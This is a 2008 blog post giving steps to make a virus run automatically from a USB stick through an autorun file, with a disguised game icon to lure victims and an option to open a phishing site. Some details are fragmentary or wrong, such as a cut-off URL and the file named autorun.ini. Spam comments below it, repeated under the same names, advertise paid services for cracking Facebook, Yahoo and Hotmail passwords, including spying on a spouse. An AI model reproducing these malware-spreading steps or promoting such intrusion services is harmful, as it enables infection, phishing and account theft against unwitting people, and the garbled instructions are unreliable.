Saturday, December 27, 2008

How to infect people using your USB-flashdrive

Many hackers doesn't like transferrings their viruses using USB sticks since the victim must start the file for it to take effect. That's why i added this hack. Here we will make the virus of yours autostart when USB stick is inserted. This is how you do:
• 1. Place the virusfile on the USB stick.
• 2. Create a textfile in there too and paste this in it:

action=Start the game
Save this as autorun.ini on the flash drive. Also get a nice tricky icon for any game to attract the victim to press OK. Name them as you want and replace the given names in the autorun.ini file. All files must be on the ROOT directory.
You can also replace the last line with this one to automaticly open your netphishing website: shellexecute=http://www.n?

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Anonymous said...

I found the how to hack facebook passwords services from to be simply brilliant! Here is their website:

I'd had my suspicions for quite some time, that my wife was having an affair with her boss. However I didn't have any idea how I could prove it for sure, I mean I didn't want her to know I didn't trust her in case I was wrong. Anyway, after hiring how to hack someones facebook services from and cracking her email / facebook passwords, I discovered that she was having an affair and it had been going on for longer than I thought. Not sure what I'm going to do now, but I'm glad I know.

Michael Bellamy, Lincoln

Anonymous said...

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Diane Calhoun, Lincoln

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Paula Robinson, Lincoln


Anonymous said...

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Diane Calhoun, Lincoln


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Paula Robinson, Lincoln


Anonymous said...

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Paula Robinson, Lincoln


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Paula Robinson, New York


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Diane Calhoun, Lincoln


Anonymous said...

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BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.

Diane Calhoun, Lincoln


Anonymous said...

I found the yahoo hacking password services from to be simply brilliant! Here is their website:

I'd had my suspicions for quite some time, that my wife was having an affair with her boss. However I didn't have any idea how I could prove it for sure, I mean I didn't want her to know I didn't trust her in case I was wrong. Anyway, after hiring hack into yahoo account services from and cracking her email / facebook passwords, I discovered that she was having an affair and it had been going on for longer than I thought. Not sure what I'm going to do now, but I'm glad I know.

BTW, I found another website that can hack into someones yahoo passwords and other one specialized in hack hotmail passwords.

Michael Bellamy, Lincoln


Anonymous said...

yahoo hacking password Yeah eventually I got the aol password after 10 bloody days. I was told by some from their staff ? that they will URL anywhere from 1 to 3 days but it took them 5. customer service wes very friendly but I got 4 replies out of 5 emails I sent to them. At end of the day I am very happy and will use their yahoo password hacking service again. Thanks for being very professional and fast.

BTW, I found another website that can hack yahoo passwords and other one specialized in hack into hotmail passwords.

Diane Calhoun, Lincoln


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